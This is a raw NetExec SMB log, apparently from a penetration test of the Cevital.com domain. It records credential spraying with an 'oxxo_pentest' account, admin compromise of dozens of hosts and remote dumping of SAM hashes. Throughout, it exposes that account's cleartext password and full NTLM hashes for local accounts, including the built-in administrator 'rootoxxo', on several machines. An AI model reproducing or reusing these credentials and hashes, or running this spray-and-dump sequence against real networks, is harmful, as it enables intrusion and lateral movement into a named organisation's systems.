SMB 10.34.165.4 445 CUMAX2 [*] Windows Embedded Standard
7600 x32 (name:CUMAX2) (domain:CUMAX2) (signing:False) (SMBv1:True)
SMB 10.34.165.1 445 CUMAX1 [*] Windows Embedded Standard
7600 x32 (name:CUMAX1) (domain:CUMAX1) (signing:False) (SMBv1:True)
SMB 10.34.162.129 445 OXOASP02004 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.139 445 OXOASP02002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.135 445 OXOASP02011 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.139 445 OXOASP02002 [*] Dumping SAM hashes
SMB 10.34.162.135 445 OXOASP02011 [*] Dumping SAM hashes
SMB 10.34.162.142 445 OXOAST02003 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.132 445 OXXVSRV2000 [+] Added 7 SAM hashes to the
database
SMB 10.34.162.142 445 OXOAST02003 [*] Dumping SAM hashes
SMB 10.34.162.140 445 OXOASP02018 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.152 445 LA26300001 [-] La26300001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.139 445 OXOASP02002 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.140 445 OXOASP02018 [*] Dumping SAM hashes
SMB 10.34.162.156 445 OXOASP02016 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.135 445 OXOASP02011 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.141 445 OXOBIP02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.156 445 OXOASP02016 [*] Dumping SAM hashes
SMB 10.34.162.141 445 OXOBIP02001 [*] Dumping SAM hashes
SMB 10.34.162.158 445 OXODBP02002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.142 445 OXOAST02003 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.149 445 OXOASP02017 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.158 445 OXODBP02002 [*] Dumping SAM hashes
SMB 10.34.162.140 445 OXOASP02018 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.156 445 OXOASP02016 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.149 445 OXOASP02017 [*] Dumping SAM hashes
SMB 10.34.162.143 445 OXOSCCM02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.160 445 OXOPMP02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.141 445 OXOBIP02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.143 445 OXOSCCM02001 [*] Dumping SAM hashes
SMB 10.34.162.161 445 OXOPMP02002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.160 445 OXOPMP02001 [*] Dumping SAM hashes
SMB 10.34.160.60 445 6120C-112 [+] 6120C-112\
oxxo_pentest:p8Z49-#MX6?ki@ (Guest)
SMB 10.34.162.158 445 OXODBP02002 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.149 445 OXOASP02017 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.161 445 OXOPMP02002 [*] Dumping SAM hashes
SMB 10.34.162.153 445 OXOASD02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.166 445 OXOASP02005 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.152 445 OXOBSP02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.153 445 OXOASD02001 [*] Dumping SAM hashes
SMB 10.34.162.143 445 OXOSCCM02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.160 445 OXOPMP02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.152 445 OXOBSP02001 [*] Dumping SAM hashes
SMB 10.34.162.146 445 OXOASP02009 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.159 445 OXOASP02010 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.146 445 OXOASP02009 [*] Dumping SAM hashes
SMB 10.34.162.192 445 OXOASP02024 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.161 445 OXOPMP02002 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.152 445 OXOBSP02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.153 445 OXOASD02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.170 445 OXOASP02015 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.146 445 OXOASP02009 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.171 445 OXOASP02019 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.22 445 OXODT020009 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.188 445 OXOBSP02002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:06] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.162.133 445 OXXVSRV2001 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.171 445 OXOASP02019 [*] Dumping SAM hashes
SMB 10.34.162.170 445 OXOASP02015 [*] Dumping SAM hashes
SMB 10.34.162.134 445 OXXVSRV2002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.188 445 OXOBSP02002 [*] Dumping SAM hashes
SMB 10.34.162.4 445 4005073-001 [-] 4005073-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.1 445 4004794-001 [-] 4004794-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.7 445 4005074-001 [-] 4005074-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.5 445 4004832-002 [-] 4004832-002\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.2 445 4004353-007 [-] 4004353-007\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.6 445 4004832-001 [-] 4004832-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.3 445 4004353-001 [-] 4004353-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.8 445 4004795-001 [-] 4004795-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.253 445 OXBBALSCSRV01 [+] cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Guest)
SMB 10.34.163.1 445 L2-MLR [-] L2-MLR\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.134 445 OXXVSRV2002 [*] Dumping SAM hashes
SMB 10.34.163.6 445 L2-SV800-232 [-] L2-SV800-232\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.28 445 L2-SSK-003 [-] L2-SSK-003\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.26 445 L1-SERVER-PC [-] L1-Server-Pc\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.34 445 L3-MLR [-] L3-MLR\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.48 445 L3-SERVER-PC [-] L3-SERVER-PC\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.45 445 L3-VPA1084-2 [-] L3-VPA1084-2\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.55 445 L4-SERVER-PC [-] L4-SERVER-PC\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.80 445 L1-MLR [-] L1-MLR\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.31 445 L2-SERVER-PC [-] L2-SERVER-PC\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.196 445 L-2090093059 [-] L-2090093059\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.197 445 L-2244778003 [-] L-2244778003\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.206 445 L-2100577031 [-] L-2100577031\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.202 445 L-2100577026 [-] L-2100577026\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.171 445 OXOASP02019 [+] Added 4 SAM hashes to the
database
SMB 10.34.163.203 445 L-2100577021 [-] L-2100577021\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.210 445 L-2100577018 [-] L-2100577018\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.209 445 L-2100577015 [-] L-2100577015\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.221 445 L-2244778007 [-] L-2244778007\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.224 445 L-2090093031 [-] L-2090093031\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.225 445 L-2090093021 [-] L-2090093021\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.228 445 L-2090093035 [-] L-2090093035\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.235 445 SOSO-PC [-] soso-PC\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.239 445 SOSO-PC [-] soso-PC\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.188 445 OXOBSP02002 [+] Added 4 SAM hashes to the
database
SMB 10.34.164.33 445 OXXKASTOSL01 [+] OXXKASTOSL01\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.164.131 445 HPCZJ5240FXG [-] HPCZJ5240FXG\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.164.138 445 OXXNSRV2001 [+] OXXNSRV2001\
oxxo_pentest:p8Z49-#MX6?ki@
SMB 10.34.160.96 445 OXOLT020017 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.170 445 OXOASP02015 [+] Added 4 SAM hashes to the
database
SMB 10.34.164.33 445 OXXKASTOSL01 [*] Dumping SAM hashes
SMB 10.34.162.134 445 OXXVSRV2002 [+] Added 4 SAM hashes to the
database
SMB 10.34.164.33 445 OXXKASTOSL01 [+] Added 6 SAM hashes to the
database
SMB 10.34.165.7 445 CUMAX3 [-] CUMAX3\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.165.4 445 CUMAX2 [-] CUMAX2\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.165.1 445 CUMAX1 [-] CUMAX1\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.174.9 445 OXODT02090006 [*] Windows 11 Build 22621 x64
(name:OXODT02090006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.11 445 OXODT020005 [*] Windows 11 Build 22621 x64
(name:OXODT020005) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.13 445 OXOLT020053 [*] Windows 11 Build 22621 x64
(name:OXOLT020053) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.18 445 OXOLT020060 [*] Windows 11 Build 22621 x64
(name:OXOLT020060) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.26 445 OXODT020061 [*] Windows 11 Build 22621 x64
(name:OXODT020061) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.17 445 OXOLT020032 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020032) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.27 445 OXOLT020026 [*] Windows 11 Build 22621 x64
(name:OXOLT020026) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.28 445 OXODT020057 [*] Windows 11 Build 22621 x64
(name:OXODT020057) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.42 445 OXOLT020087 [*] Windows 11 Build 22621 x64
(name:OXOLT020087) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.30 445 OXODT02030002 [*] Windows 11 Build 22621 x64
(name:OXODT02030002) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.36 445 OXODT020066 [*] Windows 11 Build 22621 x64
(name:OXODT020066) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.23 445 OXOLT020064 [*] Windows 11 Build 22621 x64
(name:OXOLT020064) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.41 445 OXOLT020014 [*] Windows 11 Build 22621 x64
(name:OXOLT020014) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.37 445 OXOLT020036 [*] Windows 11 Build 22621 x64
(name:OXOLT020036) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.38 445 OXODT020119 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020119) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.174.60 445 OXODT02070008 [*] Windows 11 Build 22621 x64
(name:OXODT02070008) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.52 445 OXODT02010002 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02010002) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.174.79 445 OXODT020073 [*] Windows 11 Build 22621 x64
(name:OXODT020073) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.40 445 OXODT02060007 [*] Windows 11 Build 22621 x64
(name:OXODT02060007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.68 445 OXODT02050001 [*] Windows 11 Build 22621 x64
(name:OXODT02050001) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.63 445 OXODT020072 [*] Windows 11 Build 22621 x64
(name:OXODT020072) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.69 445 OXOLT020055 [*] Windows 11 Build 22621 x64
(name:OXOLT020055) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.70 445 OXOLT020090 [*] Windows 11 Build 22621 x64
(name:OXOLT020090) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.58 445 OXODT02020002 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020002) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.174.51 445 OXODT02040013 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02040013) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.174.61 445 OXOLT020067 [*] Windows 11 Build 22621 x64
(name:OXOLT020067) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.9 445 OXODT02090006 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.86 445 OXODT020017 [*] Windows 11 Build 22621 x64
(name:OXODT020017) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.11 445 OXODT020005 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.13 445 OXOLT020053 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.18 445 OXOLT020060 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.26 445 OXODT020061 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.11 445 OXODT020005 [*] Dumping SAM hashes
SMB 10.34.174.17 445 OXOLT020032 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:27] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭──────────────────── Traceback (most recent call last) ────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in sam
│
│ 1493 │ │ │ add_sam_hash.sam_hashes = 0
│ 1494 │ │ │
│ 1495 │ │ │ if self.remote_ops and self.bootkey:
│ ❱ 1496 │ │ │ │ SAM_file_name = self.remote_ops.saveSAM()
│ 1497 │ │ │ │ SAM = SAMHashes(
│ 1498 │ │ │ │ │ SAM_file_name,
│ 1499 │ │ │ │ │ self.bootkey,
│
│ /usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM
│
│ 931 │
│ 932 │ def saveSAM(self):
│ 933 │ │ LOG.debug('Saving remote SAM database')
│ ❱ 934 │ │ return self.__retrieveHive('SAM')
│ 935 │
│ 936 │ def saveSECURITY(self):
│ 937 │ │ LOG.debug('Saving remote SECURITY database')
│
│ /usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in __retrieveHive
│
│ 922 │ │ except:
│ 923 │ │ │ raise Exception("Can't open %s hive" % hiveName)
│ 924 │ │ keyHandle = ans['phkResult']
│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle, '..\\Temp\\'+tmpFileName)
│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)
│ 928 │ │ # Now let's open the remote file, so it can be read later
│
│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946 in hBaseRegSaveKey
│
│ 943 │ request['hKey'] = hKey
│ 944 │ request['lpFile'] = checkNullString(lpFile)
│ 945 │ request['pSecurityAttributes'] = pSecurityAttributes
│ ❱ 946 │ return dce.request(request)
│ 947
│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType, lpData):
│ 949 │ request = BaseRegSetValue()
│
│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request
│
│ 879 │ │ │ │ │ exception = sessionErrorClass(error_code = error_code)
│ 880 │ │ │ │ else:
│ 881 │ │ │ │ │ exception = sessionErrorClass(packet = response, error_code = error_code)
│ ❱ 882 │ │ │ raise exception
│ 883 │ │ else:
│ 884 │ │ │ response = respClass(answer, isNDR64 = isNDR64)
│ 885 │ │ │ return response
╰───────────────────────────────────────────────────────────────────────────╯
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.11 445 OXODT020005
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.174.11 445 OXODT020005
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.174.11 445 OXODT020005
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
[03:25:28] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.27 445 OXOLT020026 [-] Connection Error: The
NETBIOS connection with the remote host timed out.
[03:25:29] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.11 445 OXODT020005
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.174.11 445 OXODT020005 [+] Added 4 SAM hashes to the
database
[03:25:30] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.28 445 OXODT020057 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.42 445 OXOLT020087 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.30 445 OXODT02030002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.36 445 OXODT020066 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:34] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.23 445 OXOLT020064 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[03:25:35] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.41 445 OXOLT020014 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.37 445 OXOLT020036 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:36] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.23 445 OXOLT020064 [*] Dumping SAM hashes
SMB 10.34.174.38 445 OXODT020119 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:37] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.23 445 OXOLT020064
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.174.60 445 OXODT02070008 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.23 445 OXOLT020064
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.174.23 445 OXOLT020064
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.174.52 445 OXODT02010002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:38] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.23 445 OXOLT020064
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.174.23 445 OXOLT020064 [+] Added 4 SAM hashes to the
database
SMB 10.34.174.79 445 OXODT020073 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:40] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.34.174.40 445 OXODT02060007 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:41] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied
SMB 10.34.174.68 445 OXODT02050001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.63 445 OXODT020072 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:42] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.174.69 445 OXOLT020055 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:43] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.174.70 445 OXOLT020090 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:44] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.174.58 445 OXODT02020002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:46] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.174.51 445 OXODT02040013 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.58 445 OXODT02020002 [*] Dumping SAM hashes
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.174.61 445 OXOLT020067 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.58 445 OXODT02020002
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.174.86 445 OXODT020017 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.58 445 OXODT02020002
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.174.58 445 OXODT02020002
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.174.58 445 OXODT02020002
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b0a696fac99e911923fbc419c6c
5f297:::
SMB 10.34.174.58 445 OXODT02020002 [+] Added 4 SAM hashes to the
database
[03:25:49] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.174.61 445 OXOLT020067 [*] Dumping SAM hashes
SMB 10.34.174.61 445 OXOLT020067
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.174.61 445 OXOLT020067
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[03:25:50] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.174.61 445 OXOLT020067


DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.174.61 445 OXOLT020067
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.174.61 445 OXOLT020067 [+] Added 4 SAM hashes to the
database
SMB 10.34.193.35 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.193.35 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
SMB 10.34.193.37 445 OXOLT020077 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXOLT020077) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.193.38 445 OXODT031611 [*] Windows 11 Build 22621 x64
(name:OXODT031611) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.193.39 445 OXOLT020029 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020029) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.193.37 445 OXOLT020077 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.193.38 445 OXODT031611 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.193.39 445 OXOLT020029 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:26:44] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

